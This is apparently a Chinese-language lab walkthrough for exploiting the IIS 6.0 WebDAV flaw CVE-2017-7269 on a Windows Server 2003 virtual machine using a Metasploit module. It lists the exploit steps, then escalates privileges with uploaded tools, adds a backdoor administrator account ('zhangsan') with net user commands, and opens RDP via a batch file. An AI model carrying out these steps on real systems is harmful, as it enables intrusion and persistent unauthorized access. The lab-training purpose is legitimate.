iis6.0远程代码执行漏洞
iis6.0遠程代碼執行漏洞
1、實驗環境搭建
目標主機Windows server2003 sp2
2、目標服務器需要在IIS里面開啟WebDAV
3、靶機IP:192.168.149.136(需要改成自己虛擬機win2003的地址)
Kali IP : 192.168.149.150(需要改成自己虛擬機kali的地址)
4、打開kali并且 把exp 復制到kali的/usr/share/metasploit-framework/modules/exploits/windows/iis目錄下:
注:exp為資源包,可自行下載,稍后上傳到csdn
kali中啟動Msfconsole,使用CVE-2017-7269攻擊插件
輸入:msfconsole啟動metasploit
5、然后reload_all****重啟****加載exp。
6、use exploit/windows/iis/cve_2017_7269。
7、使用show options查看相關參數。
8、設置目標主機,http主機,以及返回載荷。
9、設置完成,exploit
10、輸入shell查看目前接入權限
11、進入C盤
12、使用md命令創建123文件夾
使用dir命令查看,以及存在123文件夾
13、使用IIS6.exe提權
輸入exit退出至msf命令模式下
使用upload命令上傳IIS6.exe以及3389.bat文件至win2003 C盤下123文件夾。
14、輸入shell進入2003系統,使用提權工具,查看當前權限。
創建用戶
IIS6.0.exe “net user zhangsan 123456 /add”
把張三加入到管理員組
IIS6.0.exe “net localgroup Administrators zhangsan /add”
查看系統是否開啟3389端口。
使用iis6.exe 執行上傳的3389.bat文件。
3389端口已經打開。
我們使用zhangsan用戶進行遠程連接。
打開win10下遠程桌面(快捷命令為mstsc)
總結
以上是生活随笔為你收集整理的iis6.0远程代码执行漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: cad中lisp文件给恶作剧_AutoC
- 下一篇: 安装loadrunner,缺少VC200